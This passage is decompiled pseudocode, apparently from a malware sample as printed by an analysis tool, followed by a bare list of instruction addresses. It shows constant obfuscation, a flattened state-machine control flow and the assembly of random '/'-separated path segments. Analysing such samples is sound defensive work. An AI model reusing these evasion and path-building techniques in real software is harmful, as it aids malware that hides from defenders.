				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002329E3(_t950 + 0x274, 0x400, E0024889D(0x24c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00242025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0023F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0023839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0023C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002396CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0023F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002478B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00238736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00246B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0023F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00249B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0024889D(0x24c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x24ca38; // 0x0
														_t790 =  *0x24ca38; // 0x0
														_t793 =  *0x24ca38; // 0x0
														E00247C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00242025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x24ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0024511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0023D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0023F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00248C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0023F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0023F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

















































                                                      0x00239fe6
                                                      0x00239fed
                                                      0x00239ff6
                                                      0x00239ffe
                                                      0x0023a005
                                                      0x0023a006
                                                      0x0023a00d
                                                      0x0023a00e
                                                      0x0023a00f
                                                      0x0023a014
                                                      0x0023a01f
                                                      0x0023a022
                                                      0x0023a02d
                                                      0x0023a02f
                                                      0x0023a038
                                                      0x0023a043
                                                      0x0023a048
                                                      0x0023a053
                                                      0x0023a067
                                                      0x0023a06c
                                                      0x0023a075
                                                      0x0023a080
                                                      0x0023a092
                                                      0x0023a097
                                                      0x0023a0a0
                                                      0x0023a0ab
                                                      0x0023a0b6
                                                      0x0023a0be
                                                      0x0023a0c6
                                                      0x0023a0ce
                                                      0x0023a0d9
                                                      0x0023a0e4
                                                      0x0023a0ec
                                                      0x0023a0f7
                                                      0x0023a102
                                                      0x0023a10d
                                                      0x0023a118
                                                      0x0023a120
                                                      0x0023a129
                                                      0x0023a12e
                                                      0x0023a134
                                                      0x0023a13c
                                                      0x0023a147
                                                      0x0023a152
                                                      0x0023a15a
                                                      0x0023a165
                                                      0x0023a177
                                                      0x0023a17a
                                                      0x0023a181
                                                      0x0023a188
                                                      0x0023a193
                                                      0x0023a19b
                                                      0x0023a1a0
                                                      0x0023a1a8
                                                      0x0023a1b0
                                                      0x0023a1b8
                                                      0x0023a1c0
                                                      0x0023a1ca
                                                      0x0023a1ce
                                                      0x0023a1d4
                                                      0x0023a1dc
                                                      0x0023a1e7
                                                      0x0023a1ef
                                                      0x0023a1fa
                                                      0x0023a202
                                                      0x0023a206
                                                      0x0023a20a
                                                      0x0023a20f
                                                      0x0023a217
                                                      0x0023a222
                                                      0x0023a22a
                                                      0x0023a232
                                                      0x0023a23d
                                                      0x0023a248
                                                      0x0023a253
                                                      0x0023a25e
                                                      0x0023a269
                                                      0x0023a271
                                                      0x0023a27c
                                                      0x0023a287
                                                      0x0023a292
                                                      0x0023a29a
                                                      0x0023a2a5
                                                      0x0023a2b0
                                                      0x0023a2bb
                                                      0x0023a2c6
                                                      0x0023a2db
                                                      0x0023a2de
                                                      0x0023a2df
                                                      0x0023a2e6
                                                      0x0023a2f1
                                                      0x0023a2fc
                                                      0x0023a304
                                                      0x0023a30c
                                                      0x0023a317
                                                      0x0023a32a
                                                      0x0023a331
                                                      0x0023a33c
                                                      0x0023a352
                                                      0x0023a359
                                                      0x0023a364
                                                      0x0023a36f
                                                      0x0023a382
                                                      0x0023a389
                                                      0x0023a394
                                                      0x0023a39f
                                                      0x0023a3aa
                                                      0x0023a3b2
                                                      0x0023a3bd
                                                      0x0023a3c5
                                                      0x0023a3cd
                                                      0x0023a3d2
                                                      0x0023a3da
                                                      0x0023a3e5
                                                      0x0023a3f0
                                                      0x0023a3fb
                                                      0x0023a406
                                                      0x0023a411
                                                      0x0023a41c
                                                      0x0023a427
                                                      0x0023a42f
                                                      0x0023a434
                                                      0x0023a43c
                                                      0x0023a444
                                                      0x0023a44c
                                                      0x0023a460
                                                      0x0023a467
                                                      0x0023a472
                                                      0x0023a47d
                                                      0x0023a487
                                                      0x0023a492
                                                      0x0023a49d
                                                      0x0023a4a5
                                                      0x0023a4b0
                                                      0x0023a4be
                                                      0x0023a4c3
                                                      0x0023a4ce
                                                      0x0023a4d1
                                                      0x0023a4d5
                                                      0x0023a4da
                                                      0x0023a4e2
                                                      0x0023a4ea
                                                      0x0023a4f2
                                                      0x0023a4f7
                                                      0x0023a4ff
                                                      0x0023a507
                                                      0x0023a512
                                                      0x0023a51a
                                                      0x0023a525
                                                      0x0023a530
                                                      0x0023a538
                                                      0x0023a53d
                                                      0x0023a545
                                                      0x0023a54d
                                                      0x0023a558
                                                      0x0023a563
                                                      0x0023a56e
                                                      0x0023a57e
                                                      0x0023a582
                                                      0x0023a58a
                                                      0x0023a58e
                                                      0x0023a596
                                                      0x0023a59e
                                                      0x0023a5a6
                                                      0x0023a5ab
                                                      0x0023a5b3
                                                      0x0023a5bb
                                                      0x0023a5c6
                                                      0x0023a5d1
                                                      0x0023a5dc
                                                      0x0023a5e7
                                                      0x0023a5f2
                                                      0x0023a5fd
                                                      0x0023a609
                                                      0x0023a60c
                                                      0x0023a610
                                                      0x0023a618
                                                      0x0023a61d
                                                      0x0023a625
                                                      0x0023a638
                                                      0x0023a63f
                                                      0x0023a64a
                                                      0x0023a652
                                                      0x0023a657
                                                      0x0023a65c
                                                      0x0023a664
                                                      0x0023a66c
                                                      0x0023a679
                                                      0x0023a67d
                                                      0x0023a685
                                                      0x0023a68d
                                                      0x0023a695
                                                      0x0023a6a5
                                                      0x0023a6aa
                                                      0x0023a6b0
                                                      0x0023a6b5
                                                      0x0023a6bd
                                                      0x0023a6c5
                                                      0x0023a6ce
                                                      0x0023a6d3
                                                      0x0023a6dd
                                                      0x0023a6e2
                                                      0x0023a6e8
                                                      0x0023a6f0
                                                      0x0023a6fb
                                                      0x0023a706
                                                      0x0023a711
                                                      0x0023a719
                                                      0x0023a71e
                                                      0x0023a723
                                                      0x0023a72b
                                                      0x0023a733
                                                      0x0023a73b
                                                      0x0023a740
                                                      0x0023a748
                                                      0x0023a750
                                                      0x0023a758
                                                      0x0023a75d
                                                      0x0023a762
                                                      0x0023a76a
                                                      0x0023a776
                                                      0x0023a77b
                                                      0x0023a785
                                                      0x0023a78a
                                                      0x0023a790
                                                      0x0023a798
                                                      0x0023a7a0
                                                      0x0023a7ab
                                                      0x0023a7b6
                                                      0x0023a7c1
                                                      0x0023a7d3
                                                      0x0023a7d8
                                                      0x0023a7e9
                                                      0x0023a7ea
                                                      0x0023a7f1
                                                      0x0023a7fc
                                                      0x0023a807
                                                      0x0023a80f
                                                      0x0023a81a
                                                      0x0023a825
                                                      0x0023a830
                                                      0x0023a83b
                                                      0x0023a846
                                                      0x0023a854
                                                      0x0023a858
                                                      0x0023a860
                                                      0x0023a868
                                                      0x0023a872
                                                      0x0023a87d
                                                      0x0023a888
                                                      0x0023a893
                                                      0x0023a89b
                                                      0x0023a8a0
                                                      0x0023a8a5
                                                      0x0023a8ad
                                                      0x0023a8b5
                                                      0x0023a8c0
                                                      0x0023a8cb
                                                      0x0023a8d6
                                                      0x0023a8e1
                                                      0x0023a8ec
                                                      0x0023a8f7
                                                      0x0023a902
                                                      0x0023a90d
                                                      0x0023a918
                                                      0x0023a923
                                                      0x0023a92b
                                                      0x0023a936
                                                      0x0023a941
                                                      0x0023a955
                                                      0x0023a95a
                                                      0x0023a961
                                                      0x0023a96c
                                                      0x0023a977
                                                      0x0023a982
                                                      0x0023a989
                                                      0x0023a991
                                                      0x0023a99c
                                                      0x0023a9a4
                                                      0x0023a9ac
                                                      0x0023a9b1
                                                      0x0023a9b9
                                                      0x0023a9c9
                                                      0x0023a9cf
                                                      0x0023a9d7
                                                      0x0023a9df
                                                      0x0023a9e7
                                                      0x0023a9ef
                                                      0x0023a9f8
                                                      0x0023a9fd
                                                      0x0023aa03
                                                      0x0023aa0b
                                                      0x0023aa1e
                                                      0x0023aa1f
                                                      0x0023aa26
                                                      0x0023aa31
                                                      0x0023aa3c
                                                      0x0023aa44
                                                      0x0023aa4f
                                                      0x0023aa5a
                                                      0x0023aa65
                                                      0x0023aa79
                                                      0x0023aa80
                                                      0x0023aa92
                                                      0x0023aa99
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023aaa1
                                                      0x0023aaa1
                                                      0x0023aaa4
                                                      0x0023aaa4
                                                      0x0023aaa4
                                                      0x0023aaaa
                                                      0x00000000
                                                      0x00000000
                                                      0x0023aab0
                                                      0x0023aab0
                                                      0x0023adbb
                                                      0x0023ae14
                                                      0x0023ae19
                                                      0x0023ae2d
                                                      0x0023ae32
                                                      0x0023ae38
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x00000000
                                                      0x0023aa9d
                                                      0x0023aab6
                                                      0x0023aab6
                                                      0x0023aabc
                                                      0x0023ace5
                                                      0x0023aceb
                                                      0x0023adaa
                                                      0x0023adb1
                                                      0x00000000
                                                      0x0023acf1
                                                      0x0023acf1
                                                      0x0023acf7
                                                      0x0023ad88
                                                      0x0023ad8d
                                                      0x00000000
                                                      0x0023acfd
                                                      0x0023acfd
                                                      0x0023ad03
                                                      0x00000000
                                                      0x0023ad09
                                                      0x0023ad10
                                                      0x0023ad26
                                                      0x0023ad2e
                                                      0x0023ad64
                                                      0x0023ad69
                                                      0x0023ad6e
                                                      0x0023ad76
                                                      0x00000000
                                                      0x0023ad76
                                                      0x0023ad03
                                                      0x0023acf7
                                                      0x0023aac2
                                                      0x0023aac2
                                                      0x0023acac
                                                      0x0023acbb
                                                      0x0023acc2
                                                      0x0023acc9
                                                      0x0023acd1
                                                      0x0023acd2
                                                      0x0023acda
                                                      0x00000000
                                                      0x0023aac8
                                                      0x0023aace
                                                      0x0023ac86
                                                      0x0023ac8d
                                                      0x00000000
                                                      0x0023aad4
                                                      0x0023aada
                                                      0x0023ac01
                                                      0x0023ac02
                                                      0x0023ac0b
                                                      0x0023ac0d
                                                      0x0023ac29
                                                      0x0023ac2d
                                                      0x0023ac2f
                                                      0x0023ac4c
                                                      0x0023ac51
                                                      0x0023ac54
                                                      0x0023ac58
                                                      0x0023ac5a
                                                      0x0023b013
                                                      0x0023b014
                                                      0x0023b01b
                                                      0x0023b022
                                                      0x0023b041
                                                      0x0023b041
                                                      0x0023ac60
                                                      0x0023ac60
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x00000000
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023ac5a
                                                      0x0023aae0
                                                      0x0023aae6
                                                      0x0023abcb
                                                      0x0023abcf
                                                      0x0023abd2
                                                      0x0023abd7
                                                      0x0023abde
                                                      0x0023abde
                                                      0x00000000
                                                      0x0023aaec
                                                      0x0023aaec
                                                      0x0023aaf2
                                                      0x0023b006
                                                      0x0023b006
                                                      0x0023b00c
                                                      0x0023abe2
                                                      0x0023abe2
                                                      0x00000000
                                                      0x0023abe2
                                                      0x0023aaf8
                                                      0x0023aaf8
                                                      0x0023ab0b
                                                      0x0023ab12
                                                      0x0023ab3b
                                                      0x0023ab4e
                                                      0x0023ab6c
                                                      0x0023ab71
                                                      0x0023ab85
                                                      0x0023ab8a
                                                      0x0023ab91
                                                      0x0023ab98
                                                      0x0023ab9c
                                                      0x0023aba0
                                                      0x0023aaa1
                                                      0x0023aaa4
                                                      0x0023aaa4
                                                      0x0023aaaa
                                                      0x00000000
                                                      0x00000000
                                                      0x0023aaaa
                                                      0x0023aaf2
                                                      0x0023aae6
                                                      0x0023aada
                                                      0x0023aace
                                                      0x0023aac2
                                                      0x0023aabc
                                                      0x0023b04a
                                                      0x0023b054
                                                      0x0023ae42
                                                      0x0023ae42
                                                      0x0023ae48
                                                      0x0023afef
                                                      0x0023aff1
                                                      0x0023b001
                                                      0x00000000
                                                      0x0023aff3
                                                      0x0023aff3
                                                      0x00000000
                                                      0x0023aff3
                                                      0x0023ae4e
                                                      0x0023ae4e
                                                      0x0023ae54
                                                      0x0023af59
                                                      0x0023af64
